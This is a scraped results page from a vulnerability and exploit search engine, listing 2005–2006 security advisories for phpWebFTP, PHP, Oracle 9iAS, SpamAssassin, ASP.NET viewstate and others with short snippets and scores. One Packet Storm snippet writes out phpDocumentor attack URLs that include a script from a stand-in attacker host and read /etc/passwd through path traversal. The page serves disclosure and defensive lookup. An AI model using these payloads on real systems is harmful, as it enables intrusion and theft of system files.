CVE Search Engine - Security Vulnerabilities and Exploits Search Tool

show all

4412 matches found

Tenable Nessus•added 2006/05/13 12:0 a.m.•26 views

FreeBSD : phpwebftp -- 'language' Local File Inclusion (d9dc2697-dadf-11da-912f-00123ffe8333)

Secunia reports : phpWebFTP have a vulnerability, which can be exploited by malicious people to disclose sensitive information. Input passed to the 'language' parameter in index.php isn't properly verified, before it is used to include files. This can be exploited to include arbitrary files from...

6.4CVSS5.4AI score0.01764EPSS

Exploits0References4

Check Point Advisories•added 2006/03/09 12:0 a.m.•1 views

Integrity Clientless Security (ICS) Update 3.7.68.0

Check Point Integrity Clientless Security ICS for Connectra prevents users with potentially harmful software from accessing your network and requires that they conform to the organization?s antivirus and firewall policies. For more information, please refer to Connectra documentation and to ICS...

1.6AI score

Exploits0

Check Point Advisories•added 2006/02/09 12:0 a.m.•0 views

Integrity Clientless Security (ICS) Update 3.7.59.0

1.6AI score

Exploits0

Check Point Advisories•added 2006/01/26 12:0 a.m.•0 views

Integrity Clientless Security (ICS) Update 3.7.57.0

1.6AI score

Exploits0

Cent OS•added 2006/01/19 10:25 p.m.•98 views

kernel security update

CentOS Errata and Security Advisory CESA-2006:0140 Updated kernel packages that fix several security issues in the Red Hat Enterprise Linux 3 kernel are now available. This security advisory has been rated as having important security impact by the Red Hat Security Response Team. The Linux kernel...

7.8CVSS6AI score0.05357EPSS

Exploits11References9

Check Point Advisories•added 2006/01/05 12:0 a.m.•1 views

Integrity Clientless Security (ICS) Update 3.7.50.0

2AI score

Exploits0

Packet Storm•added 2005/12/31 12:0 a.m.•36 views

phpdocumentor_130rc4_incl_expl.txt

---- PhpDocumentor also, if magicquotesgpc off: http://target/pathtophpdocumentor/Documentation/tests/bug-559668.php?FORUMLIB=http://attacker/script.txt%00 http://target/pathtophpdocumentor/Documentation/tests/bug-559668.php?FORUMLIB=../../../../../../../etc/passwd%00...

7.4AI score

Exploits0

securityvulns•added 2005/11/28 12:0 a.m.•37 views

PHP Doc System 1.5.1 Local file inclusion vuln.

PHP Doc System 1.5.1 Local file inclusion vuln. Vuln. dicovered by : r0t Date: 27 nov. 2005 Orginal advisory:http://pridels.blogspot.com/2005/11/php-doc-system-151-local-file.html Vendor:http://www.alexking.org/ affected version: 1.5.1 and prior Product Description: A modular PHP system for...

0.2AI score

Exploits0

securityvulns•added 2005/11/09 12:0 a.m.•31 views

Oracle DBMS_ASSERT and the October 2005 CPU

Whilst there are problems with the Oracle October 2005 Critical Patch Update, it's not all bad news.... There is a great deal of evidence in this patch that Oracle are beginning to treat security properly. They've introduced a new package PL/SQL package DBMSASSERT into the RDBMS. Whilst DBMSASSER...

7.9AI score

Exploits0

OpenVAS•added 2005/11/03 12:0 a.m.•18 views

Oracle 9iAS access to SOAP documentation

In a default installation of Oracle 9iAS, it is possible to access SOAP documentation. These files might be useful for an attacker to determine what application server is being used. OpenVAS Vulnerability Test $Id: oracle9isoapdocs.nasl 8023 2017-12-07 08:36:26Z teissa $ Description: Oracle 9iAS...

0.2AI score

Exploits0

OpenVAS•added 2005/11/03 12:0 a.m.•35 views

Oracle 9i Application Server SOAP Documentation Accessible - Active Check

In a default installation of Oracle 9i Application Server AS, it is possible to access SOAP documentation. These files might be useful for an attacker to determine what application server is being used. SPDX-FileCopyrightText: 2003 Javier Fernandez-Sanguino Some text descriptions might be excerpt...

5.8AI score

Exploits0References3

OSV•added 2005/08/30 5:3 p.m.•5 views

CVE-2005-2654

phpldapadmin before 0.9.6c allows remote attackers to gain anonymous access to the LDAP server, even when disableanonbind is set, via an HTTP request to login.php with the anonymousbind parameter set...

6.7AI score

Exploits0References4

Tenable Nessus•added 2005/07/13 12:0 a.m.•59 views

FreeBSD : php -- multiple vulnerabilities (d47e9d19-5016-11d9-9b5f-0050569f0001)

Secunia reports : Multiple vulnerabilities have been reported in PHP, which can be exploited to gain escalated privileges, bypass certain security restrictions, gain knowledge of sensitive information, or compromise a vulnerable system. %NASLMINLEVEL 70300 C Tenable Network Security, Inc. The...

10CVSS7.3AI score0.10042EPSS

Exploits0References5

RedHat Linux•added 2005/06/23 7:19 p.m.•32 views

Moderate: Red Hat Security Advisory: spamassassin security update

An updated spamassassin package that fixes a denial of service bug when parsing malformed messages is now available. This update has been rated as having moderate security impact by the Red Hat Security Response Team. SpamAssassin provides a way to reduce unsolicited commercial email SPAM from...

5CVSS5.8AI score0.08349EPSS

Exploits0References4

securityvulns•added 2005/05/03 12:0 a.m.•37 views

ASP.NET __VIEWSTATE crypto validation prone to replay attacks

Good morning, ASP.NET's extremely popular VIEWSTATE functionality provides an automatic, uniform method for storing current state of all webpage "controls" including form fields, database views, etc, so that user-entered data automagically persists and is populated across newly rendered HTML, and...

Exploits0

securityvulns•added 2005/04/21 12:0 a.m.•41 views

Postgres: pg_hba.conf, md5, pg_shadow, encrypted passwords

Greetings, There appears to be some deficiencies in both the documentation of the 'md5' authentication methology in pghba.conf and in the md5 hash generation which is stored in pgshadow. The md5 hash which is generated for and stored in pgshadow does not use a random salt but instead uses the...

7.2AI score

Exploits0

0day.today•added 2005/04/01 12:0 a.m.•14 views

BakBone NetVault 6.x/7.x Local Stack Buffer Overflow Exploit

Exploit for unknown platform in category local exploits ============================================================ BakBone NetVault 6.x/7.x Local Stack Buffer Overflow Exploit ============================================================ / for more informations class101.org/netv-locsbof.pdf /...

6.8AI score

Exploits0

securityvulns•added 2005/03/31 12:0 a.m.•27 views

Multiple XSS issues in Sun AnswerBook2

PTT SECURITY ADVISORY DATE: 08-02-2005 AUTHOR: THOMAS LIAM ROMANIS CURRENT EMPLOYER: Echelon Ltd VENDOR: Sun PRODUCT: Sun AnswerBook2 VERSIONS TESTED: 1.4.4 on Solaris 8.0 Sparc TITLE: Multiple issues in Sun Answerbook2 Full Disclosure. Summary. A number of issues have been identified in Sun...

4.3CVSS0.2AI score0.0172EPSS

Exploits4

Packet Storm•added 2005/03/22 12:0 a.m.•42 views

serversAlive.txt

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Advisory information: Title: Servers Alive - Privilege Escalation CVE Candidate Number: CAN-2005-0352 Application: Servers Alive Versions known affected: 4.1, 5.0; other versions not tested. Classification: Privilege Escalation Author: Michael Starks...

7.2CVSS6.8AI score0.00387EPSS

Exploits1